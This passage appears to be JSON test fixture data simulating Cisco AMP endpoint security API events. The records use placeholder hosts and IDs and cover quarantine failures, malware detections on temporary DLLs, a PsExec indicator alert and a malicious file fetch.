found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud 